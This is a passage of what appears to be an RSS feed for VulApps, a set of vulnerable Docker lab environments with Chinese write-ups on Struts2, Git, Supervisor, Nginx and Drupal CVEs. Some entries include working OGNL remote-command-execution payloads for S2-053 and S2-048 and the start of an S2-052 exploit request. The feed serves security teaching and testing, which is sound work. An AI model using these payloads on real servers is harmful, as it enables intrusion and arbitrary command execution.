class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-053 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt; &lt;h4 id=&quot;poc&quot;&gt;PoC&lt;/h4&gt; &lt;ol&gt; &lt;li&gt; &lt;p&gt;访问 Demo 页面, 随便输入值，可看到页面输出我们提交的值 &lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-053/poc-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt; &lt;/li&gt; &lt;li&gt; &lt;p&gt;在输入框中输入 &lt;code class=&quot;highlighter-rouge&quot;&gt;%{100-3}&lt;/code&gt;，然后提交，发现 &lt;code class=&quot;highlighter-rouge&quot;&gt;%{}&lt;/code&gt; 中的表达式被执行 &lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-053/poc-2.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt; &lt;p&gt;命令执行 Exp(有回显):&lt;/p&gt; &lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}...</description>
        <pubDate>Thu, 07 Sep 2017 16:56:15 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-053/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-053/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Struts2 远程代码执行漏洞(S2-052)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt; .highlight pre{ white-space: pre-wrap; } &lt;/style&gt; &lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;https://cwiki.apache.org/confluence/display/WW/S2-052&quot;&gt;S2-052 公告&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-052 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-052 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt; &lt;h4 id=&quot;exp&quot;&gt;Exp&lt;/h4&gt; &lt;blockquote&gt; &lt;p&gt;来源：&lt;a href=&quot;http://blog.csdn.net/caiqiiqi/article/details/77861477&quot;&gt;Tomcat部署war - caiqiiqi的博客&lt;/a&gt;&lt;/p&gt; &lt;/blockquote&gt; &lt;p&gt;执行 &lt;code class=&quot;highlighter-rouge&quot;&gt;/usr/bin/touch /tmp/vuln&lt;/code&gt; 命令：&lt;/p&gt; &lt;div class=&quot;language-http highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nf&quot;&gt;POST&lt;/span&gt; &lt;span class=&quot;nn&quot;&gt;/orders;jsessionid=A82EAA2857A1FFAF61FF24A1FBB4A3C7&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;HTTP&lt;/span&gt;&lt;span class=&quot;o&quot;&gt;/&lt;/span&gt;&lt;span class=&quot;m&quot;&gt;1.1&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;Host&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;127.0.0.1:8080&lt;/span&gt; &lt;span class=&quot;na&quot;&gt;User-Agent&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;s&quot;&gt;Mozilla/5.0...</description>
        <pubDate>Wed, 06 Sep 2017 02:19:23 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-052/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-052/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>SSH 命令注入漏洞(CVE-2017-1000117)</title>
        <description>&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;p&gt;恶意人员可以通过巧妙构造 &lt;code class=&quot;highlighter-rouge&quot;&gt;ssh://…&lt;/code&gt; 链接，让受害人在执行程序等情况下访问该恶意链接，从而达到命令执行的目的。&lt;/p&gt; &lt;h3 id=&quot;影响范围&quot;&gt;影响范围&lt;/h3&gt; &lt;h4 id=&quot;修复版本&quot;&gt;修复版本&lt;/h4&gt; &lt;ul&gt; &lt;li&gt;Git v2.14.1、2.7.6、v2.8.6、v2.9.5、v2.10.4、v2.11.3、v2.12.4 和 v2.13.5&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;镜像信息&quot;&gt;镜像信息&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;值&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;Git&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;1.9.1&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;HTTP 端口&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;80&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;镜像 tag&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;s_ssh_1&lt;/code&gt;&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_ssh_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 8000:80 medicean/vulapps:s_ssh_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 8000:80&lt;/code&gt; 前面的 8000 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt;...</description>
        <pubDate>Sat, 12 Aug 2017 18:54:47 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_ssh_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_ssh_1/</guid>
        
        <category>SSH</category>
        
        <category>Command-Execution</category>
        
        
        <category>SSH</category>
        
      </item>
    
      <item>
        <title>Supervisor Remote Code Execution(CVE-2017-11610)</title>
        <description>&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;p&gt;Supervisor 是用 Python 开发的一套通用的进程管理程序，能将一个普通的命令行进程变为后台 daemon，并监控进程状态，异常退出时能自动重启。Supervisor可通过web接口管理服务，在配置了web接口后，同时会在服务器启动一个 XMLRPC 服务器，端口为 9001。该接口可配置需要密码访问，或者无需认证访问。&lt;/p&gt; &lt;p&gt;在获取该接口的访问权限后，远程攻击者可发送一段精心构造的请求，可在服务器执行任意代码。&lt;/p&gt; &lt;p&gt;详细信息参考：&lt;a href=&quot;https://github.com/Supervisor/supervisor/issues/964&quot;&gt;[CVE-2017-11610] RCE vulnerability report&lt;/a&gt;&lt;/p&gt; &lt;h3 id=&quot;影响版本&quot;&gt;影响版本&lt;/h3&gt; &lt;p&gt;大于 3.0&lt;/p&gt; &lt;h4 id=&quot;已经确认&quot;&gt;已经确认：&lt;/h4&gt; &lt;ul&gt; &lt;li&gt;Supervisor 3.1.2&lt;/li&gt; &lt;li&gt;Supervisor 3.3.2&lt;/li&gt; &lt;/ul&gt; &lt;h4 id=&quot;已修复此漏洞版本&quot;&gt;已修复此漏洞版本&lt;/h4&gt; &lt;ul&gt; &lt;li&gt;Supervisor 3.3.3&lt;/li&gt; &lt;li&gt;Supervisor 3.2.4&lt;/li&gt; &lt;li&gt;Superivsor 3.1.4&lt;/li&gt; &lt;li&gt;Supervisor 3.0.1&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;镜像信息&quot;&gt;镜像信息&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;用户名&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;密码&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;http://127.0.0.1/9001/RPC2&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;vulapps&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;vulapps&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;blockquote&gt; &lt;p&gt;本环境默认无认证，如需开启，请修改 &lt;code class=&quot;highlighter-rouge&quot;&gt;/etc/supervisor.conf&lt;/code&gt; 文件&lt;/p&gt; &lt;/blockquote&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_supervisor_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker...</description>
        <pubDate>Thu, 27 Jul 2017 16:41:04 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_supervisor/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_supervisor/</guid>
        
        <category>Supervisor</category>
        
        <category>RCE</category>
        
        
        <category>Supervisor</category>
        
      </item>
    
      <item>
        <title>HawkEye</title>
        <description>&lt;p&gt;项目地址：&lt;a href=&quot;https://github.com/0xbug/Hawkeye&quot;&gt;https://github.com/0xbug/Hawkeye&lt;/a&gt;&lt;/p&gt; &lt;p&gt;工具作者：0xbug&lt;/p&gt; &lt;h3 id=&quot;工具简介&quot;&gt;工具简介&lt;/h3&gt; &lt;p&gt;&lt;strong&gt;Hawkeye&lt;/strong&gt;是用来监控 github 代码库，及时发现员工托管公司代码到 GitHub 行为并预警，降低代码泄露风险&lt;/p&gt; &lt;h3 id=&quot;镜像信息&quot;&gt;镜像信息&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;用户名&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;密码&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;mongodb&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;空&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;空&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;mongodb路径&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;/var/lib/mongodb&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;-&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;Hawkeye路径&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;/opt/hawkeye&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;-&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;Hawkeye 端口&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;80&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;-&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:tools_hawkeye &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span...</description>
        <pubDate>Mon, 17 Jul 2017 16:41:04 +0000</pubDate>
        <link>http://vulapps.evalbug.com/tools_hawkeye/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/tools_hawkeye/</guid>
        
        <category>HawkEye</category>
        
        <category>Tools</category>
        
        
      </item>
    
      <item>
        <title>Nginx整数溢出漏洞 (CVE-2017-7529)</title>
        <description>&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;p&gt;当使用nginx标准模块时，攻击者可以通过发送包含恶意构造 range 域的 header 请求，来获取响应中的缓存文件头部信息。在某些配置中，缓存文件头可能包含后端服务器的IP地址或其它敏感信息，从而导致信息泄露。&lt;/p&gt; &lt;p&gt;参考：&lt;a href=&quot;http://bobao.360.cn/learning/detail/4102.html&quot;&gt;【漏洞分析】Nginx range 过滤器整形溢出漏洞 (CVE–2017–7529)预警分析&lt;/a&gt;&lt;/p&gt; &lt;h3 id=&quot;漏洞影响&quot;&gt;漏洞影响&lt;/h3&gt; &lt;p&gt;该漏洞影响所有 0.5.6 - 1.13.2版本内默认配置模块的Nginx只需要开启缓存攻击者即可发送恶意请求进行远程攻击造成信息泄露。&lt;/p&gt; &lt;p&gt;当Nginx服务器使用代理缓存的情况下攻击者通过利用该漏洞可以拿到服务器的后端真实IP或其他敏感信息。&lt;/p&gt; &lt;p&gt;通过我们的分析判定该漏洞利用难度低可以归属于low-hanging-fruit的漏洞在真实网络攻击中也有一定利用价值。&lt;/p&gt; &lt;h4 id=&quot;影响版本&quot;&gt;影响版本&lt;/h4&gt; &lt;p&gt;Nginx version 0.5.6 - 1.13.2&lt;/p&gt; &lt;h4 id=&quot;修复版本&quot;&gt;修复版本&lt;/h4&gt; &lt;p&gt;Nginx version 1.13.3, 1.12.1&lt;/p&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:n_nginx_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 8000:80 medicean/vulapps:n_nginx_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 8000:80&lt;/code&gt; 前面的 8000 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt; &lt;h4 id=&quot;poc&quot;&gt;POC&lt;/h4&gt; &lt;p&gt;1.访问缓存文件拿到 Content-Length，以 /proxy/demo.png 为例：&lt;/p&gt; &lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-bash&quot; data-lang=&quot;bash&quot;&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;curl &lt;span class=&quot;nt&quot;&gt;-I&lt;/span&gt; http://127.0.0.1:8000/proxy/demo.png HTTP/1.1 200 OK Server: nginx/1.13.1 Date: Wed,...</description>
        <pubDate>Fri, 14 Jul 2017 03:03:29 +0000</pubDate>
        <link>http://vulapps.evalbug.com/n_nginx_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/n_nginx_1/</guid>
        
        <category>Nginx</category>
        
        <category>Integer-Overflows</category>
        
        <category>Information-Disclosure</category>
        
        
        <category>Nginx</category>
        
      </item>
    
      <item>
        <title>Struts2-struts1-plugin 插件远程代码执行漏洞(S2-048)</title>
        <description>&lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;ul&gt; &lt;li&gt;&lt;a href=&quot;https://cwiki.apache.org/confluence/display/WW/S2-048&quot;&gt;S2-048 公告&lt;/a&gt;&lt;/li&gt; &lt;/ul&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:s_struts2_s2-048 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 80:8080 medicean/vulapps:s_struts2_s2-048 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 80:8080&lt;/code&gt; 前面的 80 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt; &lt;/ol&gt; &lt;h3 id=&quot;使用与利用&quot;&gt;使用与利用&lt;/h3&gt; &lt;p&gt;访问 &lt;code class=&quot;highlighter-rouge&quot;&gt;http://你的 IP 地址:端口号/&lt;/code&gt;&lt;/p&gt; &lt;h4 id=&quot;poc&quot;&gt;PoC&lt;/h4&gt; &lt;blockquote&gt; &lt;p&gt;例如目标地址为：http://127.0.0.1:32768/&lt;/p&gt; &lt;/blockquote&gt; &lt;p&gt;1.访问本例目标地址&lt;/p&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;http://127.0.0.1:32768/integration/editGangster.action&lt;/code&gt;&lt;/p&gt; &lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-048/poc-1.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt; &lt;p&gt;2.如下图在Gangster Name字段输入 Payload &lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-048/poc-2.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt; &lt;p&gt;3.提交后可看到表达式被执行 &lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-048/poc-3.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt; &lt;h4 id=&quot;exp&quot;&gt;EXP&lt;/h4&gt; &lt;p&gt;核心部分如下：&lt;/p&gt; &lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=#parameters.cmd[0]).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt; &lt;p&gt;需要再指定一个 cmd 参数，传入要执行的命令：&lt;/p&gt; &lt;p&gt;&lt;img src=&quot;https://github.com/Medicean/VulApps/raw/master/s/struts2/s2-048/exp.png&quot; alt=&quot;&quot; /&gt;&lt;/p&gt; &lt;h3 id=&quot;参考链接&quot;&gt;参考链接&lt;/h3&gt; &lt;ul&gt;...</description>
        <pubDate>Fri, 07 Jul 2017 15:57:35 +0000</pubDate>
        <link>http://vulapps.evalbug.com/s_struts2_s2-048/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/s_struts2_s2-048/</guid>
        
        <category>Struts2</category>
        
        <category>RCE</category>
        
        
        <category>Struts2</category>
        
      </item>
    
      <item>
        <title>Drupal PECL YAML parser 远程代码执行漏洞(CVE-2017-6920)</title>
        <description>&lt;style type=&quot;text/css&quot;&gt; .highlight pre{ white-space: pre-wrap; } &lt;/style&gt; &lt;h3 id=&quot;漏洞信息&quot;&gt;漏洞信息&lt;/h3&gt; &lt;p&gt;Drupal是使用PHP语言编写的开源内容管理框架（CMF），它由内容管理系统（CMS）和PHP开发框架（Framework）共同构成。Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞。&lt;/p&gt; &lt;h3 id=&quot;影响版本&quot;&gt;影响版本&lt;/h3&gt; &lt;p&gt;Drupal &amp;lt; 8.3.4&lt;/p&gt; &lt;h3 id=&quot;镜像信息&quot;&gt;镜像信息&lt;/h3&gt; &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;th style=&quot;text-align: center&quot;&gt;类型&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;用户名&lt;/th&gt; &lt;th style=&quot;text-align: center&quot;&gt;密码&lt;/th&gt; &lt;/tr&gt; &lt;/thead&gt; &lt;tbody&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;Mysql&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;root&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;root&lt;/td&gt; &lt;/tr&gt; &lt;tr&gt; &lt;td style=&quot;text-align: center&quot;&gt;/user/login&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;admin&lt;/td&gt; &lt;td style=&quot;text-align: center&quot;&gt;admin123&lt;/td&gt; &lt;/tr&gt; &lt;/tbody&gt; &lt;/table&gt; &lt;h3 id=&quot;获取环境&quot;&gt;获取环境:&lt;/h3&gt; &lt;ol&gt; &lt;li&gt;拉取镜像到本地 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker pull medicean/vulapps:d_drupal_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;/li&gt; &lt;li&gt;启动环境 &lt;div class=&quot;language-bash highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;&lt;span class=&quot;nv&quot;&gt;$ &lt;/span&gt;docker run &lt;span class=&quot;nt&quot;&gt;-d&lt;/span&gt; &lt;span class=&quot;nt&quot;&gt;-p&lt;/span&gt; 8000:80 medicean/vulapps:d_drupal_1 &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt; &lt;/div&gt; &lt;blockquote&gt; &lt;p&gt;&lt;code class=&quot;highlighter-rouge&quot;&gt;-p 8000:80&lt;/code&gt; 前面的 8000 代表物理机的端口，可随意指定。&lt;/p&gt; &lt;/blockquote&gt; &lt;/li&gt;...</description>
        <pubDate>Thu, 29 Jun 2017 15:57:35 +0000</pubDate>
        <link>http://vulapps.evalbug.com/d_drupal_1/</link>
        <guid isPermaLink="true">http://vulapps.evalbug.com/d_drupal_1/</guid>
        
        <category>Drupal</category>
        
        <category>RCE</category>
        
        
        <category>Drupal</category>
        
      </item>
    
      <item>
        <title>FFmpeg 文件读取漏洞(CVE-2017-9993)</title>
